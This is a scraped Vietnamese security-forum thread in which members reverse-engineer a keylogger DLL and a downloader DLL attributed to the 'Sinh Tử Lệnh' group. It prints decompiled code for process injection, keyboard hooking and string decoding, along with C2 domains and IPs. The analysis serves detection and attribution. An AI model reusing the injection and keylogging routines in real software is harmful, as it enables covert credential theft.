Hì hì thì có vài cái IP liên quan đây TQN à! Qua RCE file ....doc của STL, TQN đã tìm ra domain của website mà malware truy câp đền (để gửi đến các thông tin lấy cắp từ máy nạn nhân, cũng như nhận các command từ website ) là SMARTSHOW.INFO. Hiện nay website Smartshow.info nay đã không active, nên không thể trực tiếp resolve ra địa chỉ IP, computer name. location.... và các thông tin khác của webserver đang hosting website nói trên, cũng như mailserver liên quan mà STL đang dùng hay đã từng dùng. Đó cũng là cách mà STL dấu bài. Nhưng người ta vẫn có cách tìm ra những thông tin quan trong liên quan đến smartshow.info domain và website, dù rằng STL đã "tắt" website này từ lâuvà nhiều thông tin whois của domain đã được che đậy với kỹ thuật Private protection, như ta đã thấy. Sẽ xin viết cụ thể trong bài tới ]]>
/hvaonline/posts/list/38818.html#238236 /hvaonline/posts/list/38818.html#238236 GMT
RCE đám virus của Sinh Tử Lệnh. /hvaonline/posts/list/38818.html#238239 /hvaonline/posts/list/38818.html#238239 GMT RCE đám virus của Sinh Tử Lệnh. /hvaonline/posts/list/38818.html#238250 /hvaonline/posts/list/38818.html#238250 GMT RCE đám virus của Sinh Tử Lệnh. /hvaonline/posts/list/38818.html#238256 /hvaonline/posts/list/38818.html#238256 GMT RCE đám virus của Sinh Tử Lệnh. /hvaonline/posts/list/38818.html#238262 /hvaonline/posts/list/38818.html#238262 GMT RCE đám virus của Sinh Tử Lệnh.

Kihote wrote:
hi anh TQN hịc thấy anh nóng máu quá =.= . em Whois domain đó thấy DNS domain trỏ về Name Server:NS1.BYETHOST42.ORG Name Server:NS2.BYETHOST42.ORG Sao ko thử liên hệ bên đó xem log bên đó anh nhỉ ? Lần theo domain phải là cách hông anh? Em thấy lần theo domain nó âm u quá.  
Đây chỉ là domain name của các máy chủ phân giải tên miền (Name servers) của tên miền-website SMARTSHOW.INFO thôi. Không phải là host name (computer name) của webserver (máy chủ chứa websites), mà website SMARTSHOW.INFO của STL đang hosting trên webserver này. Mailserver của STL cũng nằm tai server nói trên. Nó "âm u" quá, thì ta phải make it more clear ra chứ. Hì hì Đã có thêm một số thông tin về Hardkbd.dll wbmain.dll. Sẽ xin post ở bài kế tiếp (chắc là trước bài sẽ viết về SMARTSHOW.INFO website) ]]>
/hvaonline/posts/list/38818.html#238280 /hvaonline/posts/list/38818.html#238280 GMT
RCE đám virus của Sinh Tử Lệnh. Code:
osVer = GetVersion();
  pszPath = 0;
  memset(buffer, 0, 518u);
  hProcess = GetCurrentProcess();
  GetModuleFileNameExW(hProcess, 0, &pszPath, 260u);
  PathStripPathW(&pszPath);
  if ( !_wcsicmp(&pszPath, L"services.exe") )
  {
      ThreadId = 0;
      CreateThread(0, 0, ServicesThreadProc, 0, 0, &ThreadId);
  }
  notWinLogonExe = _wcsicmp(&pszPath, L"winlogon.exe");
  if ( osVer == 6 )
  {
      if ( notWinLogonExe )
          goto @@IsExplorer;
      ThreadId = 0;
      CreateThread(0, 0, WinLogonThreadProc, 0, 0, &ThreadId);
      ptid = &ThreadId;
      createFlags = 0;
      pParams = 0;
      threadProc = InjectExplorerThreadProc;
      goto @@CreateThread;
  }
  if ( !notWinLogonExe )
  {
      ThreadId = 0;
      InitMSDataVXDFile_LoadIEFrameOCX_HookKeyboard();
      CreateThread(0, 0, InjectExplorerThreadProc, 0, 0, &ThreadId);
  }
  if ( !_wcsicmp(&pszPath, L"logonui.exe") )
  {
      ptid = &ThreadId;
      createFlags = 0;
      pParams = 0;
      ThreadId = 0;
      threadProc = ThreadInLogOnUIExe;
@@CreateThread:
      CreateThread(0, 0, threadProc, pParams, createFlags, ptid);
  }
@@IsExplorer:
  if ( !_wcsicmp(&pszPath, L"explorer.exe") )
  {
      ThreadId = 0;
      CreateThread(0, 0, ThreadInExplorer, 0, 0, &ThreadId);
  }
  return -1;
Đoạn code khởi tạo file msdata.vxd, load ieframe.ocx và hook keyboard: Code:
if ( SHGetFolderPathA(0, CSIDL_COOKIES|CSIDL_PRINTERS, 0, 0, &DstBuf) < 0
    || (sprintf_s(&DstBuf, 260u, "%s\\msdata.vxd", &DstBuf),
        hmsdatavxd = CreateMSDataVxdFile(&DstBuf),
        hObject = hmsdatavxd,
        hmsdatavxd == -1) )
  {
      result = -1;
  }
  else
  {
      g_hmsdatavxdfile = hmsdatavxd;
      v2 = GetCurrentThreadId();
      SetWindowsHookExA(WH_KEYBOARD, DllRegisterServer, 0, v2);
      write_xor_0x6F_to_msdata_vxd_file(0x12u, hObject, "\r\n[Logon Window]\r\n");
      ThreadId = 0;
      CreateThread(0, 0, RemoteLoadIEFrameOCX, 0, 0, &ThreadId);
      result = 0;
  }
  return result;
Đoạn code load ieframe.ocx: Code:
do
  {
      Sleep(2000u);
      hLogonUIExe = FindLogonUIExeHandle();
      outputDbgBuf[0] = 0;
      memset(&outputDbgBuf[1], 0, 0x7Fu);
      sprintf_s(outputDbgBuf, 0x80u, "Logonui %i", hLogonUIExe);
      OutputDebugStringA(outputDbgBuf);
  }
  while ( !hLogonUIExe );
  *wszOcxPath = 0;
  memset(&wszOcxPath[2], 0, 0x144Eu);
  GetModuleFileNameW(hDLLInstance, wszOcxPath, 2600u);
  *wczDllPath = 0;
  memset(&wczDllPath[2], 0, 0x144Eu);
  GetModuleFileNameW(hDLLInstance, wczDllPath, 0xA28u);
  PathStripPathW(wczDllPath);
  *StrStrIW(wszOcxPath, wczDllPath) = 0;
  wcscat_s(wszOcxPath, 0xA28u, L"ieframe.ocx");
  hProcess = OpenProcess(0x3Au, 0, hLogonUIExe);
  v3 = hProcess;
  if ( hProcess )
  {
      lpMem = VirtualAllocEx(hProcess, 0, 0x1450u, 0x3000u, 4u);
      if ( lpMem )
      {
          lpwsz = wszOcxPath;
          NumberOfBytesWritten = 0;
          do
          {
              LenOfOCXPath = *lpwsz;
              lpwsz += 2;
          }
          while ( LenOfOCXPath );
          if ( WriteProcessMemory(v3, lpMem, wszOcxPath, 2 * ((lpwsz - &wszOcxPath[2]) >> 1), &NumberOfBytesWritten) )
          {
              ThreadId = 0;
              hThread = CreateRemoteThread(v3, 0, 0, LoadLibraryW, lpMem, 0, &ThreadId);
              CloseHandle(hThread);
          }
      }
  }
  return 0;
Tụi này chơi local buffer bự bà cố luôn, 5200 byte. Khiếp thê, MAX_PATH đâu mấy đại ca. VirtualAllocEx cũng 5200 byte luôn. Code:
char wczDllPath[5200];
char wszOcxPath[5200];
Mai mốt có viết con nào khác thì gởi em review code cho nhé. Nếu em bắt xoá, viết lại thì cứ chịu khó nhé. PS: À mà có cái này em không biết, LOBYTE(GetVersion) == 6 có phải là Windows 7 không mấy đại ca ! Máy em cùi bắp, chỉ chạy được Win2000 nên không bao giờ dám biết Vista, Win7 là gì cả. Thông cảm cho em hỏi hơi dốt nhé. Mai mốt đừng có nhét cái mail address
xuongduongtrenmang@gmail.com 
vào cái email 2 của yahoo mail của em nữa nhé. Tính vu oan giá hoạ cho CA bắt em à. Chơi bẩn thế mấy nhóc ! Tụi mày chống phản động mà lại đi dùng cái mail đó à ? Bà con gâu gồ cái adress đó thì thấy. Em tính post hoàn chỉnh toàn bộ pesudoC code của hardkbd.dll, nhưng thấy không cần thiết, vì tụi này code C không có gì đặc biệt, cao thủ hay dùng một kỹ thuật mới nào cả. Toàn là "cái ai cũng biết là ai đó" nên thôi. Em tạm dừng hardkbd.dll ở đây. Nhưng bà còn an tâm, còn hơn 10 file dll, exe của tụi này nữa. Anh em BKIS, CMC vào tham gia cho vui, nếu em có gì sai, RCE non kém thì chỉ bảo cho em với. ]]>
/hvaonline/posts/list/38818.html#238283 /hvaonline/posts/list/38818.html#238283 GMT
RCE đám virus của Sinh Tử Lệnh.
Đây là MS Rich data của wbmain.dll:
Thằng code hardkbd.dll lại hớ hênh, build với debug info, không xoá debug info nên thư mục source code của nó còn nằm chình ình trong file dll:
Bà con gấu gồ với key: CyberGame thì sẽ tìm ra điều thú vị. Không lẽ có dính đến học viên của Aptech à ???? Qua debug info của hardkbd.dll, ta có thể kết luận, thằng coder STL này create project với name là ieframe.dll, sau đó nó mới đổi tên ieframe.dll thành hardkdb.dll và ieframe.ocx. Vậy chắc có lẽ ieframe.ocx không cần nữa, nhưng nếu ai đó up cho tui thì tốt. Trong wbmain.dll, STL coder này dùng một số hàm API WinHttp rất ít dùng, ít phổ biến (thậm chí em khi còn là coder cũng không biết tới, chỉ biết WinInet API, sau này search tới search lui mới biết). Các hàm WinHttp này nằm trong Winhttp.dll, khi build include Winhttp.h và link với Winhttp.lib:
Và HTTP header của nó:
Google với key WinHttpOpen, chỉ những trang tiếng Việt, nó cho ta topic (theo tui là chính xác nhất, cả Gecko gì đó luôn): http://forums.congdongcviet.com/showthread.php?p=202006#post202006 Không biết lequochoang2 này là ai, và sorry Kevin Hoàng nhé, em có dính dáng gì không ? À mà quên, cái Gecko string này chỉ là 1 trong 1 đống Gecko string của tụi nó, từ từ em post sau. Thằng coder wbmain.dll này dùng tá lã hết, copy code hả em, khi thì dùng socket API, khi thì dùng WinHttp API. Em chả hiểu nổi nữa. Bà con đừng giận em câu giờ, câu bài nhé, thích thì em mới làm thôi. Cái của nợ dll, exe này em có từ năm ngoái lân, nhưng chưa bao giờ RCE xong xuôi, ra đầu ra đũa cả. Bây giờ mới móc ra mà làm, post lên ! Sao có mình em độc diễn vầy nè, buồn quá ! Bà con reversers khác vào tham gia cho vui chứ !]]>
/hvaonline/posts/list/38818.html#238286 /hvaonline/posts/list/38818.html#238286 GMT
RCE đám virus của Sinh Tử Lệnh. /hvaonline/posts/list/38818.html#238302 /hvaonline/posts/list/38818.html#238302 GMT RCE đám virus của Sinh Tử Lệnh. Code:
int __stdcall Decode(int key1, int key2, int srcBuf, int destBuf, int len)
{
  int mod; // edx@1
  int i; // ecx@1
  int result; // eax@3

  i = 0;
  mod = key1 % len;
  if ( len <= 0 )
  {
      result = 0;
  }
  else
  {
      do
      {
          *(mod + destBuf) = -1 - *(i + srcBuf);
          mod = (mod + key2) % len;
          ++i;
      }
      while ( i < len );
      result = 0;
  }
  return result;
}
Luôn luôn key1 = 0x9108D key2 = 0xD9E61 Hàm decode này em RCE đúng không, mấy anh em STL ? Lại còn dùng CRC32 nữa à ? Có copy code ở đâu không đó mấy em ! Hàm BuildCrc32Table hơi bị quái, do compiler hay do mấy em code đó. VA = 0x10001020 Code:
int __cdecl BuildCRC32Table()
{
  unsigned int i; // ecx@1
  unsigned int v1; // eax@2
  int v2; // eax@5
  int v3; // eax@8
  int v4; // eax@11
  int v5; // eax@14
  int v6; // eax@17
  int v7; // eax@20
  int result; // eax@23

  i = 0;
  do
  {
      v1 = i >> 1;
      if ( i & 1 )
          v1 ^= 0xEDB88320u;
      if ( v1 & 1 )
          v2 = (v1 >> 1) ^ 0xEDB88320;
      else
          v2 = v1 >> 1;
      if ( v2 & 1 )
          v3 = (v2 >> 1) ^ 0xEDB88320;
      else
          v3 = v2 >> 1;
      if ( v3 & 1 )
          v4 = (v3 >> 1) ^ 0xEDB88320;
      else
          v4 = v3 >> 1;
      if ( v4 & 1 )
          v5 = (v4 >> 1) ^ 0xEDB88320;
      else
          v5 = v4 >> 1;
      if ( v5 & 1 )
          v6 = (v5 >> 1) ^ 0xEDB88320;
      else
          v6 = v5 >> 1;
      if ( v6 & 1 )
          v7 = (v6 >> 1) ^ 0xEDB88320;
      else
          v7 = v6 >> 1;
      if ( v7 & 1 )
          result = (v7 >> 1) ^ 0xEDB88320;
      else
          result = v7 >> 1;
      CRCTable[i++] = result;
  }
  while ( i < 256 );
  return result;
}
Nói về crypto thì em phải goị mrro bằng sư phụ, nhưng mấy cái thuật toán crypto vớ vẫn, đơn giản là em nhình ra liền à. quangrelight à, anh biết em cũng là cao thủ về IDA, em vào giúp anh cái. Hàm decode có rồi, em hãy thử viết script = IDAPython, IDC, AppCall hay run emulate trên Bochs hoặc x86emu để lấy ra cái original string của tụi này cái. Giờ anh làm biếng code quá !]]>
/hvaonline/posts/list/38818.html#238304 /hvaonline/posts/list/38818.html#238304 GMT
RCE đám virus của Sinh Tử Lệnh. /hvaonline/posts/list/38818.html#238311 /hvaonline/posts/list/38818.html#238311 GMT RCE đám virus của Sinh Tử Lệnh.

quangredlight wrote:
:D Hi bác TQN em đọc cái decode thì chỉ biết nó decode ra 6 cái địa chỉ , và dùng 1 hàm để lấy random 1 trong 6 cái đấy và connect gửi thông tin lên, xor 0x1D cái decode này em ko phân tích IDA được, toàn cho vào máy ảo rồi Olly thôi, đang ngồi hóng các cao thủ cho giải pháp decode nó, thật sự đọc cái decode này mà phát điên luôn ý, rối kinh khủng Giờ máy em đang điên điên :-( :-( , chắc phải cài lại win rồi mới làm tiếp được 
Theo tôi, nếu gặp những khó khăn như trên, có thể nghĩ đến một cách tiếp cận khác. (sau đó có thể quay lai cách tiếp cận cũ) Các file .dll (hardkbd.dll- keylogger và wbmain.dll-downloader) mà chúng ta đang disassembling có những mối liên hệ với một service quan trong mà Trojan thiết lập mới trong hệ thống, có nhiệm vụ tạo socket kết nối Internet với máy chủ -website của hacker, để chuyển thông tin lấy cắp và nhận lệnh (thí dụ website smartshow.info) Service này, trong các malicious tool (ware) của STL hay của các Chinese hacker khác thường là "iprip", tiến trình của nó là svchost.exe -k netsves (chú ý phân biệt với svchost.exe gốc của Windows-local service) Vì bận quá, nên tôi chưa có thời gian phân tích kỹ 2 file dll nói trên và cho chay file virus.doc trên máy thật. Vả lại có phân tích thì cũng không bằng TQN được. Tuy nhiên đã socket spying sơ qua file tiến trình svchost.exe -k netsves nói trên (Bận quá, đang mắc nợ 2 bài mà chưa viết được, thông tin thì đã đủ. Sorry) ]]>
/hvaonline/posts/list/38818.html#238321 /hvaonline/posts/list/38818.html#238321 GMT
RCE đám virus của Sinh Tử Lệnh. /hvaonline/posts/list/38818.html#238330 /hvaonline/posts/list/38818.html#238330 GMT RCE đám virus của Sinh Tử Lệnh. 98 9A 91 9A 8D 9E 93 D1+src dd 9A919A98h, 0D1939E8Dh, 0D0939287h, 0 --> /general.xml  
15170 ; char dword_10015170[] _0000128C:10015170 D1 CF 9A DF 8B DF D3 8B+dword_10015170 dd 0DF9ACFD1h, 8BD3DF8Bh, 93DFDF8Dh, 0D1AA9E88h, 0DFD3D1F5h, 0DA9C9A97h, 938CCF9Ah, 0CED08B85h _0000128C:10015170 8D DF DF 93 88 9E AA D1+ ; DATA XREF: ThreadProc+2C4o _0000128C:10015170 F5 D1 D3 DF 97 9A 9C DA+ ; ThreadProc+2DFo _0000128C:10015170 9A CF 8C 93 85 8B D0 CE+ dd 0D19CCE91h, 91B99092h, 969B87ACh, 0D19AD0F2h, 0BED0AAD1h, 8EDFABF5h, 0C5B28790h, 0C9BCCDABh _0000128C:10015170 91 CE 9C D1 92 90 B9 91+ dd 0F597D093h, 91D296CEh, 90DA8F96h, 0DFC2C590h, 0B8CC8D90h, 9391D5CCh, 90B78FC5h, 938FABF2h _0000128C:10015170 AC 87 9B 96 F2 D0 9A D1+ dd 9CCBCE8Bh, 9ED7969Ah, 8DBC9AC5h, 8C8B8CC4h, 0D5CDF2C9h, 9C918BA8h, 0DFD19C8Ch, 0CE9A96D3h _0000128C:10015170 D1 AA D0 BE F5 AB DF 8E+ dd 9EC491CFh, 968C93CFh, 9092C4C5h, 0F2CCF59Ch, 87C4C6C6h, 0B8DFBE98h, 909288C2h, 90CFAFDFh _0000128C:10015170 90 87 B2 C5 AB CD BC C9+ dd 8BCA96D1h, 0AA90DFB7h, 8C9391D0h, 0CFCE8C87h, 0F2D291DFh, 9BC4D6BAh, 0AB8BDFD4h, 8FDFF5D0h _0000128C:10015170 93 D0 97 F5 CE 96 D2 91+ dd 0CFF2D09Eh, 0A890918Bh, 9399DF8Fh, 96C48E89h, 0D1F5D19Ah, 8B9296D0h, 0C794DF9Ah, 87939EB1h _0000128C:10015170 96 8F DA 90 90 C5 C2 DF+ dd 0 --> GET %s HTTP/1.1 Host: %s User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Connection: Close  
FF 99 FF B2 dword_10015264 dd 0B2FF99FFh ; DATA XREF: sub_10002B70+6Do _0000128C:10015264 ; sub_10002B70+87o _0000128C:10015268 FF A3 FF 90 dd 90FFA3FFh _0000128C:1001526C FF 8B FF BC dd 0BCFF8BFFh _0000128C:10015270 FF 8C FF 9E dd 9EFF8CFFh _0000128C:10015274 FF B2 FF 90 dd 90FFB2FFh _0000128C:10015278 FF 9B FF B2 dd 0B2FF9BFFh _0000128C:1001527C FF 8D FF D1 dd 0D1FF8DFFh _0000128C:10015280 FF A3 FF 9C dd 9CFFA3FFh _0000128C:10015284 FF 97 FF 8B dd 8BFF97FFh _0000128C:10015288 FF 96 FF 97 00 00 00 00+ dd 97FF96FFh, 5 dup(0) --> UNICODE: Microsoft\MMC\hh.dat  
Em thấy có mấy chỗ nữa call Decode nhưng mà chỗ nào put thẳng src vào thì em decode đuơc, chỗ nào gọi qua ref đến register thì em chịu, chưa tìm được src nó trỏ đến đâu. đây là đoạn fasm em dùng để decode, bác nào tìm được ref thì cho vào chạy :D
format PE console ;CRT fix 'msvcrt.dll' include 'win32ax.inc' .data src dd 9A919A98h, 0D1939E8Dh, 0D0939287h, 0 s2 dd 0DF9ACFD1h, 8BD3DF8Bh, 93DFDF8Dh, 0D1AA9E88h, 0DFD3D1F5h, 0DA9C9A97h, 938CCF9Ah, 0CED08B85h dd 0D19CCE91h, 91B99092h, 969B87ACh, 0D19AD0F2h, 0BED0AAD1h, 8EDFABF5h, 0C5B28790h, 0C9BCCDABh dd 0F597D093h, 91D296CEh, 90DA8F96h, 0DFC2C590h, 0B8CC8D90h, 9391D5CCh, 90B78FC5h, 938FABF2h dd 9CCBCE8Bh, 9ED7969Ah, 8DBC9AC5h, 8C8B8CC4h, 0D5CDF2C9h, 9C918BA8h, 0DFD19C8Ch, 0CE9A96D3h dd 9EC491CFh, 968C93CFh, 9092C4C5h, 0F2CCF59Ch, 87C4C6C6h, 0B8DFBE98h, 909288C2h, 90CFAFDFh dd 8BCA96D1h, 0AA90DFB7h, 8C9391D0h, 0CFCE8C87h, 0F2D291DFh, 9BC4D6BAh, 0AB8BDFD4h, 8FDFF5D0h dd 0CFF2D09Eh, 0A890918Bh, 9399DF8Fh, 96C48E89h, 0D1F5D19Ah, 8B9296D0h, 0C794DF9Ah, 87939EB1h dd 0 ;56*4 s3 dd 0B2FF99FFh dd 90FFA3FFh dd 0BCFF8BFFh dd 9EFF8CFFh dd 90FFB2FFh dd 0B2FF9BFFh dd 0D1FF8DFFh dd 9CFFA3FFh dd 8BFF97FFh dd 97FF96FFh, 5 dup(0) dst db 2048 dup(0) .code start: stdcall Decode,9108Dh,0D9E61h,s3,dst,10*4 invoke ExitProcess,0 Decode: db 8Bh,44h,24h,04h,56h,8Bh,74h,24h,18h db 33h,0C9h,99h,0F7h,0FEh,85h,0F6h,7Eh db 2Bh,53h,8Bh,5Ch,24h,10h,55h,8Bh,6Ch db 24h,18h,57h,8Bh,7Ch,24h,20h,0Ch,0FFh db 2Ah,04h,29h,88h,04h,3Ah,8Dh,04h,1Ah db 99h,0F7h,0FEh,41h,3Bh,0CEh,7Ch,0EDh db 5Fh,5Dh,5Bh,33h,0C0h,5Eh,0C2h,14h,00h .end start  
]]>
/hvaonline/posts/list/38818.html#238337 /hvaonline/posts/list/38818.html#238337 GMT
RCE đám virus của Sinh Tử Lệnh.








Dù gì thì xem hình vẫn rõ ràng, dễ hiểu hơn là post đống ASM hay C code, phải không anh em ? Windows\System32\uxtheme.dll không phải là malware, mục đích của coder của malware wbmain.dll này là patch đường dẫn full của wbmain.dll trong PEB.Ldr link list thành path của uxtheme.dll thôi. Hoàn toàn không ngoài mục đích che dấu wbmain.dll trong các trình Process viewers. Nếu wbmain.dll của mấy đại ca STL thì em nói cái uxtheme.dll này đúng không vậy, chứ không mấy anh chê em RCE nửa mùa, không tới nơi tới chốn nữa. PS: Em chỉ dùng x86-emulator để decode các string thôi, không cần đao to búa lớn. Chi tiết sử dụng x86-emulator, bà con reversers VN ta xem trong cuốn "IDA Pro Book" gì đó. Khoe một chút: Thấy font và color của OllyDbg em đang dùng đẹp không. Font: Raize, color: Alex Black.]]>
/hvaonline/posts/list/38818.html#238356 /hvaonline/posts/list/38818.html#238356 GMT
RCE đám virus của Sinh Tử Lệnh. /hvaonline/posts/list/38818.html#238359 /hvaonline/posts/list/38818.html#238359 GMT RCE đám virus của Sinh Tử Lệnh.

TQN wrote:
Tính post tiếp nhưng tới lúc decode xong lại thấy ngờ ngợ, hình như là, khoãng 50%, wbmain.dll có lẽ không phải của STL, nhưng cũng có thể. Bà con ai nhớ cái: www.adobe-upgrade.com và AdobeUpdateManager.exe không ? AdobeUpdateManager.exe hình như là 1 con Bot, còn server adobe-upgrade.com thì down lâu rồi, whois, google không thấy. Không lẽ tui đi sai hướng. Hiện tại trong đống virus database lưu trên máy tui, thấy rõ 2 trường phái coding khác nhau. Version của 2 đám này cũng lung tung hết, không xác định được. Nếu thật là sai hướng thì xin lỗi anh em, đã làm mất thời gian của anh em theo dõi tọpic này. 
AdobeUpdateManager.exe có nhúng vào một bot. Việc này McAfee phát hiện cách đây khoảng nửa năm gì đó. McAfee có thông báo trên một blog của họ và tôi có hai ý kiến trong phần comment. wbmain.dll thì Kaspersky đã phát hiện cách đây vài tháng gì đó và phân loại nó là một downloader Trojan (Trojan.Downloader.Win32.Agent.ffxc), PE compact file. Hãng Ikarus cũng đã detect ra con này trước đây. Hardkbd.dll và wbmain.dll đã xuất hiện từ năm 2007 và đươc sử dung như một file "thông dụng-hiệu quả" để nhét vào nhiều loai Trojan khác nhau. STL và các hacker Trung quốc nói chung thích "sử dụng" các file này và cải tiến chúng trong quá trình sử dụng. Thí dụ gần đây chúng đưa vào các "Keymaker" để tạo ra các key-serial no. dùng cho 1 chương trình cài đặt VM (máy ảo) trên một hệ thống Windows. Gần đây AntiVir (tác già phần mềm nổi tiếng Antivirus Avira) và hãng Dr.Web (một hãng IT và Antivirus đang lên của Nga-Liên xô cũ) cũng đã detect ra Hardkbd.dll như là một Trojan Quá trình compile và disassembling hai file dll nói trên của TQN khá hay và mang lại nhiều thông tin hữu ích. Cám ơn TQN ]]>
/hvaonline/posts/list/38818.html#238361 /hvaonline/posts/list/38818.html#238361 GMT
RCE đám virus của Sinh Tử Lệnh. /hvaonline/posts/list/38818.html#238363 /hvaonline/posts/list/38818.html#238363 GMT RCE đám virus của Sinh Tử Lệnh.

TQN wrote:
Tính post tiếp nhưng tới lúc decode xong lại thấy ngờ ngợ, hình như là, khoãng 50%, wbmain.dll có lẽ không phải của STL, nhưng cũng có thể. Bà con ai nhớ cái: www.adobe-upgrade.com và AdobeUpdateManager.exe không ? AdobeUpdateManager.exe hình như là 1 con Bot, còn server adobe-upgrade.com thì down lâu rồi, whois, google không thấy. Không lẽ tui đi sai hướng. Hiện tại trong đống virus database lưu trên máy tui, thấy rõ 2 trường phái coding khác nhau. Version của 2 đám này cũng lung tung hết, không xác định được. Nếu thật là sai hướng thì xin lỗi anh em, đã làm mất thời gian của anh em theo dõi tọpic này. 
AdobeUpdateManager.exe có nhúng vào một bot. Việc này McAfee phát hiện cách đây khoảng nửa năm gì đó. McAfee có thông báo trên một blog của họ và tôi có hai ý kiến trong phần comment. wbmain.dll thì Kaspersky đã phát hiện cách đây vài tháng gì đó và phân loại nó là một downloader Trojan (Trojan.Downloader.Win32.Agent.ffxc), PE compact file. Hãng Ikarus cũng đã detect ra con này trước đây. Hardkbd.dll và wbmain.dll đã xuất hiện từ năm 2007 (tác giả đầu tiên có lẽ là các hacker Mỹ hay Nga) và đươc sử dung như một file "thông dụng-hiệu quả" để nhét vào nhiều loai Trojan khác nhau. STL và các hacker Trung quốc nói chung thích "sử dụng" các file này và cải tiến chúng trong quá trình sử dụng. Thí dụ gần đây chúng đưa vào các "Keymaker" để tạo ra các key-serial no. dùng cho 1 chương trình cài đặt VM (máy ảo) trên một hệ thống Windows. Gần đây AntiVir (tác già phần mềm nổi tiếng Antivirus Avira) và hãng Dr.Web (một hãng IT và Antivirus đang lên của Nga-Liên xô cũ) cũng đã detect ra Hardkbd.dll như là một Trojan Quá trình compile và disassembling hai file dll nói trên của TQN khá hay và mang lại nhiều thông tin hữu ích. Cám ơn TQN ]]>
/hvaonline/posts/list/38818.html#238364 /hvaonline/posts/list/38818.html#238364 GMT
RCE đám virus của Sinh Tử Lệnh. <!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd";> <html xmlns=\"http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <meta name="description" content="Diễn đàn X-Cafe - Tôn trọng sự khác biệt trên tinh thần duy lý"> <link rel=StyleSheet href="/verification/verification.css" type="text/css" media="screen,print"> <title>Dien dan X-cafe - Ton trong su khac biet tren tinh thanh duy ly</title> </head> <body> <div id="outer"> <div id="header"><h1>Diễn đàn X-Cafe - Tôn trọng sự khác biệt trên tinh thần duy lý</h1></div> <div id="main"> <form action="/verification/index_captcha.php" method="GET"> <input type="hidden" name="auth_key" value="94d3fa0375ca9e22b54f431051c797d2"> <input type="submit" value="Bấm vào đây để đi tiếp"> </form> </div> </div> </body> </html>   KAV đã phát hiện ra toàn bộ wscntfy.* này là Vecebot, vì vậy em phải tạm tắt KAV Mục đích cuối cùng của em là tìm cho ra thằng nào up msdata.vxd chứa keypress của em lên cho tụi STL để nó hai lần vào lấy account HVA, Yahoo của em.]]> /hvaonline/posts/list/38818.html#238365 /hvaonline/posts/list/38818.html#238365 GMT RCE đám virus của Sinh Tử Lệnh.

TQN wrote:
hardkbd.dll thì em đã up cho Kaspersky lab để phân tích rồi. Em cũng gởi kèm file IDA .idb của em luôn. Tiếp theo, chúng ta sẽ tiếp tục với đám bot của tụi STL này. Đám bot này Zorro gởi cho tui, không biết sao Zorro lại dính nó. Và chắc chắn đám bot này là của tụi STL, không chạy đi đâu được. Dưới đây là file config của đám bot này:
<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd";> <html xmlns=\"http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <meta name="description" content="Diễn đàn X-Cafe - Tôn trọng sự khác biệt trên tinh thần duy lý"> <link rel=StyleSheet href="/verification/verification.css" type="text/css" media="screen,print"> <title>Dien dan X-cafe - Ton trong su khac biet tren tinh thanh duy ly</title> </head> <body> <div id="outer"> <div id="header"><h1>Diễn đàn X-Cafe - Tôn trọng sự khác biệt trên tinh thần duy lý</h1></div> <div id="main"> <form action="/verification/index_captcha.php" method="GET"> <input type="hidden" name="auth_key" value="94d3fa0375ca9e22b54f431051c797d2"> <input type="submit" value="Bấm vào đây để đi tiếp"> </form> </div> </div> </body> </html>  
KAV đã phát hiện ra toàn bộ wscntfy.* này là Vecebot, vì vậy em phải tạm tắt KAV Mục đích cuối cùng của em là tìm cho ra thằng nào up msdata.vxd chứa keypress của em lên cho tụi STL để nó hai lần vào lấy account HVA, Yahoo của em. 
Các file .vxd là của Microsoft, sản phẩm của lão Bill Gate từ những năm 95, 96 gì đó và chúng đã có trong Windows 95, 98.... Tuy nhiên tôi không thấy Microsoft có "ban hành" một file .xvd nào có tên là msdata. Rõ ràng đây là một file của STL, như TQN đã nhận định. File .xvd thuộc loai file liên quan đến "Virtual Device Driver" (nhưng sao Ms không đặt đuôi file là .vdd nhỉ?. Hì hì). File này hỗ trợ việc chạy một file .exe trong một quá trình liên quan đến Device Drivers, thí dụ quá trình cài đặt các Driver của một số hardware trên hệ thống hay update driver trên mang. Trong Win XP (SP3) và Win 2K3 của tất cả các máy tôi đang dủng và cài đặt, config. cho anh em cơ quan ... tôi không thấy sự hiện diện của file msdata.vxd. (Mà hầu hết hay tất cả các Win này đều là dùng chùa cả ... Hì hì. Nghèo nên không đủ tiền mua). Tôi chỉ thấy có file là dsound.vxd. File này dường như cần thiết để chứng tỏ hệ thống có thể cài đươc vào một loai GAME nào đó (DX game chăng?) TQN xem vừa qua có cài một soft. (có crack) nào đó mà quá trình cài có liên quan đến Virtual Device Driver không? Thí dụ một chương trình tạo máy ảo trên nền Windows chẳng hạn? (Dường như STL biết tìm cách mời chào những món hàng cao cấp cho những người có kỹ thuật cao cấp và chỉ chờ cơ hôi họ quá bận bịu vì công việc, nên có lúc vô tình dùng món hàng độc. Thâm như T... là vậy) ]]>
/hvaonline/posts/list/38818.html#238368 /hvaonline/posts/list/38818.html#238368 GMT
RCE đám virus của Sinh Tử Lệnh. 112.78.5.79, một IP thuộc "Công ty Cổ phần Dich vụ dữ liệu Trực tuyến" có văn phòng chính ở Q.3, TPHCM. 3. Hiện nay một số hosts trên không còn hoạt động, một số hosts khác trỏ về 209.200.249.62, một server thuộc data center LUNARPAGES ở Mỹ. Đây là nhóm IP bị blacklisted trên hầu như các thiết bị bảo mật. 4. Domain name: update-adobe.com hiện do đám onlineNIC ở HK, CN quản lý. STL đã dời hầu hết các tên miền quan trọng của họ về registrar này ở CN. Nếu đám tạo VulcanBot này cũng chọn OnlineNIC này để lưu trú như STL thì quả là thú vị ;). PS: Ngân ơi, để anh gởi em thêm vài món khá mới để em RE tiếp cho vui cửa vui nhà ;).]]> /hvaonline/posts/list/38818.html#238369 /hvaonline/posts/list/38818.html#238369 GMT RCE đám virus của Sinh Tử Lệnh. /hvaonline/posts/list/38818.html#238372 /hvaonline/posts/list/38818.html#238372 GMT RCE đám virus của Sinh Tử 